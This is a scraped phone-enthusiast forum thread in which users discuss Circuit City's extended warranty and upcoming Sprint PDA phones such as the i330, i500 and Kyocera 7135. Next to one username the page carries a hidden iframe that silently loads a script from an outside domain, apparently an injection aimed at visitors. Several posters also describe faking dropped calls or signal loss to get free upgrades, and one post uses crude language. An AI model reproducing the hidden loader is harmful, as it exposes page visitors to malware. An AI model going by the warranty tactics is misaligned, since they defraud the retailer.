+ Reply to Thread

I330 and Circuit City. Anyone in the know ?

I bought my I300 at Circuit City and took out the "extended warranty". Anyone have any info on if and when the I330 will get there ? And any tips on using the warranty to get the I330 ?

Succorso<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

i've heard roomers about the 27th of oct. But then again my friends are heavy drug users....plus sprint sticks to their release dats SOOOO welll, i origionally herd last june. I do know one guy who works at circuit city, and basically they have to take it for any reason, you could tell them you wiped your ass with it and cant get rid of the smell. the extended warrenty is really the way to go. However if you get one of their noteably "intellegent" employees, tell them it drops nearly every call while your in a full coverage area, and if you get new you might as well upgrade. with the same warrenty ive returned mine twice, just because i drop it too often. but ill be in there the first day tooo..... mine "drops calls" all the time...

Thanks for the news. I find mine drops calls all the time while wiping my ass and doing the ass wipe dance.

Looking forward to the I300.

Gator

What about the Samsung i500?

I too have the service agreement with my i300. I wonder if Circuit city will be getting the i500 bluechip as well as the i330?

Richard

I got the extended warranty from CC for my Treo 300 (should have waited a month and bought the I300 with the extended warranty from CC instead of grabbing it the first day it came out) and I fully plan on using it to "upgrade" to the Kyocera 7135 or Samsung I700 when those show up on the Sprint network and in CC stores. I think my Treo 300 will suddenly not be able to pull in a signal when either of those phones are released

For more dialogue on the replacement plans available through different retailers visit the "$4/month" thread I've stuck on the top of the page.

PHO
    Broward County Florida, "Home of the Hanging Chad"

correct me if i am wrong

but i think in order to "trade up" at CC they have to not carry the model anymore or not have it in stock. Otherwise you just trdae it in for a new treo if not in stock you get the store credit. Which i am doing as well with my i300 hoping for the i500 or the 7135 something similiar with a MS os so i can get streaming windows media

A
    Please check out my new radio show - you can listen live online Saturdays from 9-10am

www.grtalk.com

"Aaron the Research Dept."

Re: correct me if i am wrong

Originally posted by PHO
    but i think in order to "trade up" at CC they have to not carry the model anymore or not have it in stock. Otherwise you just trdae it in for a new treo if not in stock you get the store credit. Which i am doing as well with my i300 hoping for the i500 or the 7135 something similiar with a MS os so i can get streaming windows media

A
    I know that's the deal with BB but from what I've read, not the case with CC. I hear they are especially willing to let you trade up if you have a "problem" with your phone and you want to upgrade to a more expensive device.